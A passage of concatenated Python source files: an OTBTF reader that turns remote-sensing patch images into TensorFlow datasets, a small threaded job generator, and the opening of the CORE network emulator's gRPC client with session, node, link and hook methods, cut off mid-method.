class PatchesImagesReader(PatchesReaderBase):
"""
This class provides a read access to a set of patches images.
A patches image is an image of patches stacked in rows, as produced from the OTBTF "PatchesExtraction"
application, and is stored in a raster format (e.g. GeoTiff).
A source can be a particular domain in which the patches are extracted (remember that in OTBTF applications,
the number of sources is controlled by the OTB_TF_NSOURCES environment variable).
    This class makes it possible to use:
- multiple sources
- multiple patches images per source
Each patch can be independently accessed using the get_sample(index) function, with index in [0, self.size),
    self.size being the total number of patches (must be the same for each source).
:see PatchesReaderBase
"""
def __init__(self, filenames_dict: dict, use_streaming=False):
"""
:param filenames_dict: A dict() structured as follow:
{src_name1: [src1_patches_image_1.tif, ..., src1_patches_image_N.tif],
src_name2: [src2_patches_image_1.tif, ..., src2_patches_image_N.tif],
...
src_nameM: [srcM_patches_image_1.tif, ..., srcM_patches_image_N.tif]}
:param use_streaming: if True, the patches are read on the fly from the disc, nothing is kept in memory.
"""
assert (len(filenames_dict.values()) > 0)
# ds dict
self.ds = dict()
for src_key, src_filenames in filenames_dict.items():
self.ds[src_key] = []
for src_filename in src_filenames:
self.ds[src_key].append(gdal_open(src_filename))
if len(set([len(ds_list) for ds_list in self.ds.values()])) != 1:
raise Exception("Each source must have the same number of patches images")
# streaming on/off
self.use_streaming = use_streaming
# ds check
nb_of_patches = {key: 0 for key in self.ds}
self.nb_of_channels = dict()
for src_key, ds_list in self.ds.items():
for ds in ds_list:
nb_of_patches[src_key] += self._get_nb_of_patches(ds)
if src_key not in self.nb_of_channels:
self.nb_of_channels[src_key] = ds.RasterCount
else:
if self.nb_of_channels[src_key] != ds.RasterCount:
raise Exception("All patches images from one source must have the same number of channels!"
"Error happened for source: {}".format(src_key))
if len(set(nb_of_patches.values())) != 1:
raise Exception("Sources must have the same number of patches! Number of patches: {}".format(nb_of_patches))
# ds sizes
src_key_0 = list(self.ds)[0] # first key
self.ds_sizes = [self._get_nb_of_patches(ds) for ds in self.ds[src_key_0]]
self.size = sum(self.ds_sizes)
# if use_streaming is False, we store in memory all patches images
if not self.use_streaming:
patches_list = {src_key: [read_as_np_arr(ds) for ds in self.ds[src_key]] for src_key in self.ds}
            self.patches_buffer = {src_key: np.concatenate(patches_list[src_key], axis=0) for src_key in self.ds}
def _get_ds_and_offset_from_index(self, index):
offset = index
for i, ds_size in enumerate(self.ds_sizes):
if offset < ds_size:
break
offset -= ds_size
return i, offset
@staticmethod
def _get_nb_of_patches(ds):
return int(ds.RasterYSize / ds.RasterXSize)
@staticmethod
def _read_extract_as_np_arr(ds, offset):
assert (ds is not None)
psz = ds.RasterXSize
yoff = int(offset * psz)
assert (yoff + psz <= ds.RasterYSize)
buffer = ds.ReadAsArray(0, yoff, psz, psz)
if len(buffer.shape) == 3:
buffer = np.transpose(buffer, axes=(1, 2, 0))
return np.float32(buffer)
def get_sample(self, index):
"""
Return one sample of the dataset.
:param index: the sample index. Must be in the [0, self.size) range.
:return: The sample is stored in a dict() with the following structure:
{"src_key_0": np.array((psz_y_0, psz_x_0, nb_ch_0)),
"src_key_1": np.array((psz_y_1, psz_x_1, nb_ch_1)),
...
"src_key_M": np.array((psz_y_M, psz_x_M, nb_ch_M))}
"""
assert (0 <= index)
assert (index < self.size)
if not self.use_streaming:
res = {src_key: self.patches_buffer[src_key][index, :, :, :] for src_key in self.ds}
else:
i, offset = self._get_ds_and_offset_from_index(index)
res = {src_key: self._read_extract_as_np_arr(self.ds[src_key][i], offset) for src_key in self.ds}
return res
def get_stats(self):
"""
Compute some statistics for each source.
        Depending on whether streaming is used, the statistics are computed directly in memory, or chunk-by-chunk.
:return statistics dict
"""
logging.info("Computing stats")
if not self.use_streaming:
axis = (0, 1, 2) # (row, col)
stats = {src_key: {"min": np.amin(patches_buffer, axis=axis),
"max": np.amax(patches_buffer, axis=axis),
"mean": np.mean(patches_buffer, axis=axis),
"std": np.std(patches_buffer, axis=axis)} for src_key, patches_buffer in
self.patches_buffer.items()}
else:
axis = (0, 1) # (row, col)
def _filled(value):
return {src_key: value * np.ones((self.nb_of_channels[src_key])) for src_key in self.ds}
_maxs = _filled(0.0)
_mins = _filled(float("inf"))
_sums = _filled(0.0)
_sqsums = _filled(0.0)
for index in range(self.size):
sample = self.get_sample(index=index)
for src_key, np_arr in sample.items():
rnumel = 1.0 / float(np_arr.shape[0] * np_arr.shape[1])
_mins[src_key] = np.minimum(np.amin(np_arr, axis=axis).flatten(), _mins[src_key])
_maxs[src_key] = np.maximum(np.amax(np_arr, axis=axis).flatten(), _maxs[src_key])
_sums[src_key] += rnumel * np.sum(np_arr, axis=axis).flatten()
_sqsums[src_key] += rnumel * np.sum(np.square(np_arr), axis=axis).flatten()
rsize = 1.0 / float(self.size)
stats = {src_key: {"min": _mins[src_key],
"max": _maxs[src_key],
"mean": rsize * _sums[src_key],
"std": np.sqrt(rsize * _sqsums[src_key] - np.square(rsize * _sums[src_key]))
} for src_key in self.ds}
logging.info("Stats: {}".format(stats))
return stats
def get_size(self):
return self.size
"""
------------------------------------------------- IteratorBase class ---------------------------------------------------
"""
class IteratorBase(ABC):
"""
Base class for iterators
"""
@abstractmethod
def __init__(self, patches_reader: PatchesReaderBase):
pass
"""
------------------------------------------------ RandomIterator class --------------------------------------------------
"""
class RandomIterator(IteratorBase):
"""
Pick a random number in the [0, handler.size) range.
"""
def __init__(self, patches_reader):
super().__init__(patches_reader=patches_reader)
self.indices = np.arange(0, patches_reader.get_size())
self._shuffle()
self.count = 0
def __iter__(self):
return self
def __next__(self):
current_index = self.indices[self.count]
if self.count < len(self.indices) - 1:
self.count += 1
else:
self._shuffle()
self.count = 0
return current_index
def _shuffle(self):
np.random.shuffle(self.indices)
"""
--------------------------------------------------- Dataset class ------------------------------------------------------
"""
class Dataset:
"""
Handles the "mining" of patches.
    This class has a thread that extracts tuples from the readers, while ensuring access to already gathered tuples.
:see PatchesReaderBase
:see Buffer
"""
def __init__(self, patches_reader: PatchesReaderBase, buffer_length: int = 128,
Iterator: IteratorBase = RandomIterator):
"""
:param patches_reader: The patches reader instance
:param buffer_length: The number of samples that are stored in the buffer
:param Iterator: The iterator class used to generate the sequence of patches indices.
"""
# patches reader
self.patches_reader = patches_reader
self.size = self.patches_reader.get_size()
# iterator
self.iterator = Iterator(patches_reader=self.patches_reader)
# Get patches sizes and type, of the first sample of the first tile
self.output_types = dict()
self.output_shapes = dict()
one_sample = self.patches_reader.get_sample(index=0)
for src_key, np_arr in one_sample.items():
self.output_shapes[src_key] = np_arr.shape
self.output_types[src_key] = tf.dtypes.as_dtype(np_arr.dtype)
logging.info("output_types: {}".format(self.output_types))
logging.info("output_shapes: {}".format(self.output_shapes))
# buffers
self.miner_buffer = Buffer(buffer_length)
self.mining_lock = multiprocessing.Lock()
self.consumer_buffer = Buffer(buffer_length)
self.consumer_buffer_pos = 0
self.tot_wait = 0
self.miner_thread = self._summon_miner_thread()
self.read_lock = multiprocessing.Lock()
self._dump()
# Prepare tf dataset for one epoch
self.tf_dataset = tf.data.Dataset.from_generator(self._generator,
output_types=self.output_types,
output_shapes=self.output_shapes).repeat(1)
def get_stats(self) -> dict:
"""
:return: the dataset statistics, computed by the patches reader
"""
with self.mining_lock:
return self.patches_reader.get_stats()
def read_one_sample(self):
"""
Read one element of the consumer_buffer
        The lock prevents different threads from reading and updating the internal counter concurrently
"""
with self.read_lock:
output = None
if self.consumer_buffer_pos < self.consumer_buffer.max_length:
output = self.consumer_buffer.container[self.consumer_buffer_pos]
self.consumer_buffer_pos += 1
if self.consumer_buffer_pos == self.consumer_buffer.max_length:
self._dump()
self.consumer_buffer_pos = 0
return output
def _dump(self):
"""
        This function dumps the miner_buffer into the consumer_buffer, and restarts the miner_thread
"""
# Wait for miner to finish his job
t = time.time()
self.miner_thread.join()
self.tot_wait += time.time() - t
# Copy miner_buffer.container --> consumer_buffer.container
self.consumer_buffer.container = [elem for elem in self.miner_buffer.container]
# Clear miner_buffer.container
self.miner_buffer.container.clear()
# Restart miner_thread
self.miner_thread = self._summon_miner_thread()
def _collect(self):
"""
This function collects samples.
        It runs inside the miner_thread.
"""
# Fill the miner_container until it's full
while not self.miner_buffer.is_complete():
try:
index = next(self.iterator)
with self.mining_lock:
new_sample = self.patches_reader.get_sample(index=index)
self.miner_buffer.add(new_sample)
except Exception as e:
logging.warning("Error during collecting samples: {}".format(e))
def _summon_miner_thread(self):
"""
        Create and start the thread for the data collection
"""
t = threading.Thread(target=self._collect)
t.start()
return t
def _generator(self):
"""
Generator function, used for the tf dataset
"""
for elem in range(self.size):
yield self.read_one_sample()
def get_tf_dataset(self, batch_size, drop_remainder=True):
"""
Returns a TF dataset, ready to be used with the provided batch size
:param batch_size: the batch size
:param drop_remainder: drop incomplete batches
:return: The TF dataset
"""
        # Warn when the buffer holds fewer than two batches worth of samples, which can cause an I/O bottleneck
        if 2 * batch_size >= self.miner_buffer.max_length:
logging.warning("Batch size is {} but dataset buffer has {} elements. Consider using a larger dataset "
"buffer to avoid I/O bottleneck".format(batch_size, self.miner_buffer.max_length))
return self.tf_dataset.batch(batch_size, drop_remainder=drop_remainder)
def get_total_wait_in_seconds(self):
"""
Returns the number of seconds during which the data gathering was delayed because of I/O bottleneck
:return: duration in seconds
"""
return self.tot_wait
"""
------------------------------------------- DatasetFromPatchesImages class ---------------------------------------------
"""
class DatasetFromPatchesImages(Dataset):
"""
Handles the "mining" of a set of patches images.
:see PatchesImagesReader
:see Dataset
"""
def __init__(self, filenames_dict: dict, use_streaming: bool = False, buffer_length: int = 128,
Iterator: IteratorBase = RandomIterator):
"""
        :param filenames_dict: A dict() structured as follows:
{src_name1: [src1_patches_image1, ..., src1_patches_imageN1],
src_name2: [src2_patches_image2, ..., src2_patches_imageN2],
...
src_nameM: [srcM_patches_image1, ..., srcM_patches_imageNM]}
        :param use_streaming: if True, the patches are read on the fly from disk and nothing is kept in memory.
:param buffer_length: The number of samples that are stored in the buffer (used when "use_streaming" is True).
:param Iterator: The iterator class used to generate the sequence of patches indices.
"""
# patches reader
patches_reader = PatchesImagesReader(filenames_dict=filenames_dict, use_streaming=use_streaming)
super().__init__(patches_reader=patches_reader, buffer_length=buffer_length, Iterator=Iterator)
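if __name__ == "__main__":
    # Illustrative sketch (not part of the original module): builds a dataset from hypothetical patches
    # images and turns it into a batched tf.data.Dataset. The file names and batch size are placeholders.
    dataset = DatasetFromPatchesImages(
        filenames_dict={"xs": ["xs_patches_1.tif"], "labels": ["labels_patches_1.tif"]},
        use_streaming=False)
    tf_ds = dataset.get_tf_dataset(batch_size=8)
    for batch in tf_ds.take(1):
        print({key: tensor.shape for key, tensor in batch.items()})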
|
jobgen.py
|
import threading, time
from debug_utils import *
from rvs import *
from msg import *
class JobGen():
def __init__(self, inter_ar_time_rv, serv_time_rv, size_inBs_rv, out, num_jobs_to_send):
self.inter_ar_time_rv = inter_ar_time_rv
self.serv_time_rv = serv_time_rv
self.size_inBs_rv = size_inBs_rv
self.out = out
self.num_jobs_to_send = num_jobs_to_send
self.num_jobs_sent = 0
t = threading.Thread(target=self.run, daemon=True)
t.start()
def run(self):
while 1:
inter_ar_time = self.inter_ar_time_rv.sample() # random.expovariate(self.rate)
log(DEBUG, "sleeping ...", inter_ar_time=inter_ar_time)
time.sleep(inter_ar_time)
self.num_jobs_sent += 1
self.out.put(
Job(_id = self.num_jobs_sent,
serv_time = self.serv_time_rv.sample(),
size_inBs = int(self.size_inBs_rv.sample())))
if self.num_jobs_sent == self.num_jobs_to_send:
return
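if __name__ == "__main__":
    # Illustrative sketch (not part of the original module): drives JobGen with stand-in random variables.
    # DummyRV is a hypothetical placeholder; real callers pass rv objects from rvs.py that expose sample().
    import queue
    class DummyRV:
        def __init__(self, value):
            self.value = value
        def sample(self):
            return self.value
    out_q = queue.Queue()
    JobGen(inter_ar_time_rv=DummyRV(0.01), serv_time_rv=DummyRV(1.0),
           size_inBs_rv=DummyRV(1000), out=out_q, num_jobs_to_send=3)
    time.sleep(0.5)  # give the generator thread time to emit the jobs
    while not out_q.empty():
        print(out_q.get())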
|
client.py
|
"""
gRpc client for interfacing with CORE.
"""
import logging
import threading
from contextlib import contextmanager
from typing import Any, Callable, Dict, Generator, Iterable, List
import grpc
from core.api.grpc import configservices_pb2, core_pb2, core_pb2_grpc
from core.api.grpc.configservices_pb2 import (
GetConfigServiceDefaultsRequest,
GetConfigServiceDefaultsResponse,
GetConfigServicesRequest,
GetConfigServicesResponse,
GetNodeConfigServiceConfigsRequest,
GetNodeConfigServiceConfigsResponse,
GetNodeConfigServiceRequest,
GetNodeConfigServiceResponse,
GetNodeConfigServicesRequest,
GetNodeConfigServicesResponse,
SetNodeConfigServiceRequest,
SetNodeConfigServiceResponse,
)
from core.api.grpc.core_pb2 import ExecuteScriptRequest, ExecuteScriptResponse
from core.api.grpc.emane_pb2 import (
EmaneLinkRequest,
EmaneLinkResponse,
EmaneModelConfig,
EmanePathlossesRequest,
EmanePathlossesResponse,
GetEmaneConfigRequest,
GetEmaneConfigResponse,
GetEmaneEventChannelRequest,
GetEmaneEventChannelResponse,
GetEmaneModelConfigRequest,
GetEmaneModelConfigResponse,
GetEmaneModelConfigsRequest,
GetEmaneModelConfigsResponse,
GetEmaneModelsRequest,
GetEmaneModelsResponse,
SetEmaneConfigRequest,
SetEmaneConfigResponse,
SetEmaneModelConfigRequest,
SetEmaneModelConfigResponse,
)
from core.api.grpc.mobility_pb2 import (
GetMobilityConfigRequest,
GetMobilityConfigResponse,
GetMobilityConfigsRequest,
GetMobilityConfigsResponse,
MobilityActionRequest,
MobilityActionResponse,
MobilityConfig,
SetMobilityConfigRequest,
SetMobilityConfigResponse,
)
from core.api.grpc.services_pb2 import (
GetNodeServiceConfigsRequest,
GetNodeServiceConfigsResponse,
GetNodeServiceFileRequest,
GetNodeServiceFileResponse,
GetNodeServiceRequest,
GetNodeServiceResponse,
GetServiceDefaultsRequest,
GetServiceDefaultsResponse,
GetServicesRequest,
GetServicesResponse,
ServiceAction,
ServiceActionRequest,
ServiceActionResponse,
ServiceConfig,
ServiceDefaults,
ServiceFileConfig,
SetNodeServiceFileRequest,
SetNodeServiceFileResponse,
SetNodeServiceRequest,
SetNodeServiceResponse,
SetServiceDefaultsRequest,
SetServiceDefaultsResponse,
)
from core.api.grpc.wlan_pb2 import (
GetWlanConfigRequest,
GetWlanConfigResponse,
GetWlanConfigsRequest,
GetWlanConfigsResponse,
SetWlanConfigRequest,
SetWlanConfigResponse,
WlanConfig,
WlanLinkRequest,
WlanLinkResponse,
)
from core.emulator.emudata import IpPrefixes
class InterfaceHelper:
"""
Convenience class to help generate IP4 and IP6 addresses for gRPC clients.
"""
def __init__(self, ip4_prefix: str = None, ip6_prefix: str = None) -> None:
"""
Creates an InterfaceHelper object.
:param ip4_prefix: ip4 prefix to use for generation
:param ip6_prefix: ip6 prefix to use for generation
:raises ValueError: when both ip4 and ip6 prefixes have not been provided
"""
self.prefixes = IpPrefixes(ip4_prefix, ip6_prefix)
def create_interface(
self, node_id: int, interface_id: int, name: str = None, mac: str = None
) -> core_pb2.Interface:
"""
Create an interface protobuf object.
:param node_id: node id to create interface for
:param interface_id: interface id
:param name: name of interface
:param mac: mac address for interface
:return: interface protobuf
"""
interface_data = self.prefixes.gen_interface(node_id, name, mac)
return core_pb2.Interface(
id=interface_id,
name=interface_data.name,
ip4=interface_data.ip4,
ip4mask=interface_data.ip4_mask,
ip6=interface_data.ip6,
ip6mask=interface_data.ip6_mask,
mac=interface_data.mac,
)
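def _example_interface_helper():
    """
    Illustrative sketch (not part of the original module): generates interface protobufs for two
    hypothetical nodes from a /24 prefix. The node and interface ids below are placeholders.
    """
    helper = InterfaceHelper(ip4_prefix="10.0.0.0/24")
    iface_one = helper.create_interface(node_id=1, interface_id=0)
    iface_two = helper.create_interface(node_id=2, interface_id=0)
    return iface_one, iface_two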
def stream_listener(stream: Any, handler: Callable[[core_pb2.Event], None]) -> None:
"""
Listen for stream events and provide them to the handler.
:param stream: grpc stream that will provide events
:param handler: function that handles an event
:return: nothing
"""
try:
for event in stream:
handler(event)
except grpc.RpcError as e:
if e.code() == grpc.StatusCode.CANCELLED:
logging.debug("stream closed")
else:
logging.exception("stream error")
def start_streamer(stream: Any, handler: Callable[[core_pb2.Event], None]) -> None:
"""
Convenience method for starting a grpc stream thread for handling streamed events.
:param stream: grpc stream that will provide events
:param handler: function that handles an event
:return: nothing
"""
thread = threading.Thread(
target=stream_listener, args=(stream, handler), daemon=True
)
thread.start()
class CoreGrpcClient:
"""
Provides convenience methods for interfacing with the CORE grpc server.
"""
def __init__(self, address: str = "localhost:50051", proxy: bool = False) -> None:
"""
Creates a CoreGrpcClient instance.
        :param address: grpc server address to connect to
        :param proxy: True to enable the gRPC HTTP proxy channel option when connecting
"""
self.address = address
self.stub = None
self.channel = None
self.proxy = proxy
def start_session(
self,
session_id: int,
nodes: List[core_pb2.Node],
links: List[core_pb2.Link],
location: core_pb2.SessionLocation = None,
hooks: List[core_pb2.Hook] = None,
emane_config: Dict[str, str] = None,
emane_model_configs: List[EmaneModelConfig] = None,
wlan_configs: List[WlanConfig] = None,
mobility_configs: List[MobilityConfig] = None,
service_configs: List[ServiceConfig] = None,
service_file_configs: List[ServiceFileConfig] = None,
asymmetric_links: List[core_pb2.Link] = None,
config_service_configs: List[configservices_pb2.ConfigServiceConfig] = None,
) -> core_pb2.StartSessionResponse:
"""
Start a session.
:param session_id: id of session
:param nodes: list of nodes to create
:param links: list of links to create
:param location: location to set
:param hooks: session hooks to set
:param emane_config: emane configuration to set
:param emane_model_configs: node emane model configurations
:param wlan_configs: node wlan configurations
:param mobility_configs: node mobility configurations
:param service_configs: node service configurations
:param service_file_configs: node service file configurations
:param asymmetric_links: asymmetric links to edit
:param config_service_configs: config service configurations
:return: start session response
"""
request = core_pb2.StartSessionRequest(
session_id=session_id,
nodes=nodes,
links=links,
location=location,
hooks=hooks,
emane_config=emane_config,
emane_model_configs=emane_model_configs,
wlan_configs=wlan_configs,
mobility_configs=mobility_configs,
service_configs=service_configs,
service_file_configs=service_file_configs,
asymmetric_links=asymmetric_links,
config_service_configs=config_service_configs,
)
return self.stub.StartSession(request)
def stop_session(self, session_id: int) -> core_pb2.StopSessionResponse:
"""
Stop a running session.
:param session_id: id of session
:return: stop session response
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.StopSessionRequest(session_id=session_id)
return self.stub.StopSession(request)
def create_session(self, session_id: int = None) -> core_pb2.CreateSessionResponse:
"""
Create a session.
:param session_id: id for session, default is None and one will be created
for you
:return: response with created session id
"""
request = core_pb2.CreateSessionRequest(session_id=session_id)
return self.stub.CreateSession(request)
def delete_session(self, session_id: int) -> core_pb2.DeleteSessionResponse:
"""
Delete a session.
:param session_id: id of session
:return: response with result of deletion success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteSessionRequest(session_id=session_id)
return self.stub.DeleteSession(request)
def get_sessions(self) -> core_pb2.GetSessionsResponse:
"""
Retrieves all currently known sessions.
        :return: response with a list of currently known sessions, their state and
number of nodes
"""
return self.stub.GetSessions(core_pb2.GetSessionsRequest())
def check_session(self, session_id: int) -> core_pb2.CheckSessionResponse:
"""
Check if a session exists.
:param session_id: id of session to check for
:return: response with result if session was found
"""
request = core_pb2.CheckSessionRequest(session_id=session_id)
return self.stub.CheckSession(request)
def get_session(self, session_id: int) -> core_pb2.GetSessionResponse:
"""
Retrieve a session.
:param session_id: id of session
:return: response with sessions state, nodes, and links
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionRequest(session_id=session_id)
return self.stub.GetSession(request)
def get_session_options(
self, session_id: int
) -> core_pb2.GetSessionOptionsResponse:
"""
Retrieve session options as a dict with id mapping.
:param session_id: id of session
:return: response with a list of configuration groups
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionOptionsRequest(session_id=session_id)
return self.stub.GetSessionOptions(request)
def set_session_options(
self, session_id: int, config: Dict[str, str]
) -> core_pb2.SetSessionOptionsResponse:
"""
Set options for a session.
:param session_id: id of session
:param config: configuration values to set
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetSessionOptionsRequest(
session_id=session_id, config=config
)
return self.stub.SetSessionOptions(request)
def get_session_metadata(
self, session_id: int
) -> core_pb2.GetSessionMetadataResponse:
"""
Retrieve session metadata as a dict with id mapping.
:param session_id: id of session
:return: response with metadata dict
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionMetadataRequest(session_id=session_id)
return self.stub.GetSessionMetadata(request)
def set_session_metadata(
self, session_id: int, config: Dict[str, str]
) -> core_pb2.SetSessionMetadataResponse:
"""
Set metadata for a session.
:param session_id: id of session
:param config: configuration values to set
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetSessionMetadataRequest(
session_id=session_id, config=config
)
return self.stub.SetSessionMetadata(request)
def get_session_location(
self, session_id: int
) -> core_pb2.GetSessionLocationResponse:
"""
Get session location.
:param session_id: id of session
:return: response with session position reference and scale
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionLocationRequest(session_id=session_id)
return self.stub.GetSessionLocation(request)
def set_session_location(
self,
session_id: int,
x: float = None,
y: float = None,
z: float = None,
lat: float = None,
lon: float = None,
alt: float = None,
scale: float = None,
) -> core_pb2.SetSessionLocationResponse:
"""
Set session location.
:param session_id: id of session
:param x: x position
:param y: y position
:param z: z position
:param lat: latitude position
:param lon: longitude position
:param alt: altitude position
:param scale: geo scale
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
location = core_pb2.SessionLocation(
x=x, y=y, z=z, lat=lat, lon=lon, alt=alt, scale=scale
)
request = core_pb2.SetSessionLocationRequest(
session_id=session_id, location=location
)
return self.stub.SetSessionLocation(request)
def set_session_state(
self, session_id: int, state: core_pb2.SessionState
) -> core_pb2.SetSessionStateResponse:
"""
Set session state.
:param session_id: id of session
:param state: session state to transition to
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetSessionStateRequest(session_id=session_id, state=state)
return self.stub.SetSessionState(request)
def add_session_server(
self, session_id: int, name: str, host: str
) -> core_pb2.AddSessionServerResponse:
"""
Add distributed session server.
:param session_id: id of session
:param name: name of server to add
:param host: host address to connect to
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.AddSessionServerRequest(
session_id=session_id, name=name, host=host
)
return self.stub.AddSessionServer(request)
def events(
self,
session_id: int,
handler: Callable[[core_pb2.Event], None],
events: List[core_pb2.Event] = None,
) -> Any:
"""
Listen for session events.
:param session_id: id of session
:param handler: handler for received events
:param events: events to listen to, defaults to all
:return: stream processing events, can be used to cancel stream
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.EventsRequest(session_id=session_id, events=events)
stream = self.stub.Events(request)
start_streamer(stream, handler)
return stream
def throughputs(
self, session_id: int, handler: Callable[[core_pb2.ThroughputsEvent], None]
) -> Any:
"""
Listen for throughput events with information for interfaces and bridges.
:param session_id: session id
:param handler: handler for every event
:return: stream processing events, can be used to cancel stream
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.ThroughputsRequest(session_id=session_id)
stream = self.stub.Throughputs(request)
start_streamer(stream, handler)
return stream
def add_node(
self, session_id: int, node: core_pb2.Node
) -> core_pb2.AddNodeResponse:
"""
Add node to session.
:param session_id: session id
:param node: node to add
:return: response with node id
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.AddNodeRequest(session_id=session_id, node=node)
return self.stub.AddNode(request)
def get_node(self, session_id: int, node_id: int) -> core_pb2.GetNodeResponse:
"""
Get node details.
:param session_id: session id
:param node_id: node id
:return: response with node details
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNode(request)
def edit_node(
self,
session_id: int,
node_id: int,
position: core_pb2.Position = None,
icon: str = None,
source: str = None,
geo: core_pb2.Geo = None,
) -> core_pb2.EditNodeResponse:
"""
Edit a node, currently only changes position.
:param session_id: session id
:param node_id: node id
:param position: position to set node to
:param icon: path to icon for gui to use for node
:param source: application source editing node
:param geo: lon,lat,alt location for node
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.EditNodeRequest(
session_id=session_id,
node_id=node_id,
position=position,
icon=icon,
source=source,
geo=geo,
)
return self.stub.EditNode(request)
def move_nodes(
self, move_iterator: Iterable[core_pb2.MoveNodesRequest]
) -> core_pb2.MoveNodesResponse:
"""
Stream node movements using the provided iterator.
:param move_iterator: iterator for generating node movements
:return: move nodes response
:raises grpc.RpcError: when session or nodes do not exist
"""
return self.stub.MoveNodes(move_iterator)
def delete_node(self, session_id: int, node_id: int) -> core_pb2.DeleteNodeResponse:
"""
Delete node from session.
:param session_id: session id
:param node_id: node id
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteNodeRequest(session_id=session_id, node_id=node_id)
return self.stub.DeleteNode(request)
def node_command(
self,
session_id: int,
node_id: int,
command: str,
wait: bool = True,
shell: bool = False,
) -> core_pb2.NodeCommandResponse:
"""
Send command to a node and get the output.
:param session_id: session id
:param node_id: node id
:param command: command to run on node
:param wait: wait for command to complete
:param shell: send shell command
:return: response with command combined stdout/stderr
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.NodeCommandRequest(
session_id=session_id,
node_id=node_id,
command=command,
wait=wait,
shell=shell,
)
return self.stub.NodeCommand(request)
def get_node_terminal(
self, session_id: int, node_id: int
) -> core_pb2.GetNodeTerminalResponse:
"""
Retrieve terminal command string for launching a local terminal.
:param session_id: session id
:param node_id: node id
:return: response with a node terminal command
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeTerminalRequest(
session_id=session_id, node_id=node_id
)
return self.stub.GetNodeTerminal(request)
def get_node_links(
self, session_id: int, node_id: int
) -> core_pb2.GetNodeLinksResponse:
"""
Get current links for a node.
:param session_id: session id
:param node_id: node id
:return: response with a list of links
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeLinksRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNodeLinks(request)
def add_link(
self,
session_id: int,
node_one_id: int,
node_two_id: int,
interface_one: core_pb2.Interface = None,
interface_two: core_pb2.Interface = None,
options: core_pb2.LinkOptions = None,
) -> core_pb2.AddLinkResponse:
"""
Add a link between nodes.
:param session_id: session id
:param node_one_id: node one id
:param node_two_id: node two id
:param interface_one: node one interface data
:param interface_two: node two interface data
:param options: options for link (jitter, bandwidth, etc)
:return: response with result of success or failure
:raises grpc.RpcError: when session or one of the nodes don't exist
"""
link = core_pb2.Link(
node_one_id=node_one_id,
node_two_id=node_two_id,
type=core_pb2.LinkType.WIRED,
interface_one=interface_one,
interface_two=interface_two,
options=options,
)
request = core_pb2.AddLinkRequest(session_id=session_id, link=link)
return self.stub.AddLink(request)
def edit_link(
self,
session_id: int,
node_one_id: int,
node_two_id: int,
options: core_pb2.LinkOptions,
interface_one_id: int = None,
interface_two_id: int = None,
) -> core_pb2.EditLinkResponse:
"""
Edit a link between nodes.
:param session_id: session id
:param node_one_id: node one id
:param node_two_id: node two id
:param options: options for link (jitter, bandwidth, etc)
:param interface_one_id: node one interface id
:param interface_two_id: node two interface id
:return: response with result of success or failure
:raises grpc.RpcError: when session or one of the nodes don't exist
"""
request = core_pb2.EditLinkRequest(
session_id=session_id,
node_one_id=node_one_id,
node_two_id=node_two_id,
options=options,
interface_one_id=interface_one_id,
interface_two_id=interface_two_id,
)
return self.stub.EditLink(request)
def delete_link(
self,
session_id: int,
node_one_id: int,
node_two_id: int,
interface_one_id: int = None,
interface_two_id: int = None,
) -> core_pb2.DeleteLinkResponse:
"""
Delete a link between nodes.
:param session_id: session id
:param node_one_id: node one id
:param node_two_id: node two id
:param interface_one_id: node one interface id
:param interface_two_id: node two interface id
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteLinkRequest(
session_id=session_id,
node_one_id=node_one_id,
node_two_id=node_two_id,
interface_one_id=interface_one_id,
interface_two_id=interface_two_id,
)
return self.stub.DeleteLink(request)
def get_hooks(self, session_id: int) -> core_pb2.GetHooksResponse:
"""
Get all hook scripts.
:param session_id: session id
:return: response with a list of hooks
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetHooksRequest(session_id=session_id)
return self.stub.GetHooks(request)
def add_hook(
self,
session_id: int,
state: core_pb2.SessionState,
file_name: str,
file_data: str,
) -> core_pb2.AddHookResponse:
"""
Add hook scripts.
:param session_id: session id
:param state: state to trigger hook
:param file_name: name of file for hook script
:param file_data: hook script contents
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
hook = core_pb2.Hook(state=state, file=file_name, data=file_data)
request = core_pb2.AddHookRequest(session_id=session_id, hook=hook)
return self.stub.AddHook(request)
def get_mobility_configs(self, session_id: int) -> GetMobilityConfigsResponse:
"""
Get all mobility configurations.
:param session_id: session id
:return: response with a dict of node ids to mobility configurations
:raises grpc.RpcError: when session doesn't exist
"""
request = GetMobilityConfigsRequest(session_id=session_id)
return self.stub.GetMobilityConfigs(request)
def get_mobility_config(
self, session_id: int, node_id: int
) -> GetMobilityConfigResponse:
"""
Get mobility configuration for a node.
:param session_id: session id
:param node_id: node id
:return: response with a list of configuration groups
:raises grpc.RpcError: when session or node doesn't exist
"""
request = GetMobilityConfigRequest(session_id=session_id, node_id=node_id)
return self.stub.GetMobilityConfig(request)
def set_mobility_config(
self, session_id: int, node_id: int, config: Dict[str, str]
) -> SetMobilityConfigResponse:
"""
Set mobility configuration for a node.
:param session_id: session id
:param node_id: node id
